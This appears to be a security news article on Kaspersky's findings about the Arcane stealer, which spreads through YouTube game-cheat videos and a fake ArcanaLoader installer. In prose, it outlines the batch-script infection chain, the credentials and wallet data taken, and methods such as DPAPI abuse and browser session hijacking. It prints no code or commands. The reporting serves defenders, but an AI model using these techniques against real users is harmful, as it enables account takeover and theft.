do son 
Original distribution scheme | Image: Kaspersky
A new and sophisticated stealer malware named “Arcane” is targeting gamers byDistribution through YouTube videos promoting game cheats, according to a recent report by Kaspersky Labs. This malware is grabbing a significant amount of user data, posing a serious threat to unsuspecting victims.
According to Kaspersky’s report, the distribution campaign predates Arcane’s discovery, but the malware itself appears to be a successor to another stealer known as VGS. As Kaspersky noted, “The campaign in which we discovered the new stealer was already active before Arcane appeared.”
The infection chain typically begins with a YouTube video offering a fake game cheat. These videos include links to password-protected archives that, once extracted, execute a malicious batch file (start.bat). The batch script is heavily obfuscated and is designed to:
- Download a secondary password-protected archive using PowerShell
- Disable Windows SmartScreen protection to evade detection
- Extract and execute malware binaries from the archive
Once executed, Arcane immediately begins harvesting sensitive information. The stealer is capable of extracting:
- Credentials and tokens from Chromium and Gecko-based browsers
- Configuration files from major VPN clients, including OpenVPN, NordVPN, and Surfshark
- Gaming platform credentials from Steam, Riot, Epic Games, Ubisoft Connect, and Battle.net
- Messaging app data from Telegram, Discord, ICQ, and Signal
- Crypto wallet details from Exodus, Electrum, Guarda, and Coinomi
Kaspersky researchers stated, “In addition to logins, passwords, credit card data, tokens and other credentials, Arcane steals configuration files, settings, and account information from various applications.”
Arcane employs multiple methods to extract credentials, including:
- Abusing Windows Data Protection API (DPAPI) to decrypt saved browser credentials
- Utilizing the Xaitax utility to crack encryption keys stored in browser databases
- Injecting a remote debugging session into Chromium-based browsers to extract session cookies for popular services like Gmail, YouTube, Twitter, and Steam
By hijacking active browser sessions, the stealer can access password-protected accounts without needing login credentials, making it an extremely potent threat.
In early 2025, Kaspersky observed a shift in distribution tactics with the emergence of ArcanaLoader, a fake software installer that serves as an initial infection vector for Arcane Stealer. Attackers now promote ArcanaLoader through YouTube, luring users into downloading what appears to be cracked software or cheat tools.
Researchers noted that ArcanaLoader even included an invite link to a Discord server, where users were encouraged to download updates and engage with other “cheat seekers.” However, this was just another layer of social engineering designed to spread the malware.
While the Arcane campaign appears to have global reach, Kaspersky’s telemetry suggests a strong focus on Russian-speaking users. The majority of infected victims have been observed in Russia, Belarus, and Kazakhstan, aligning with the language of the YouTube videos and Discord discussions promoting the malware.
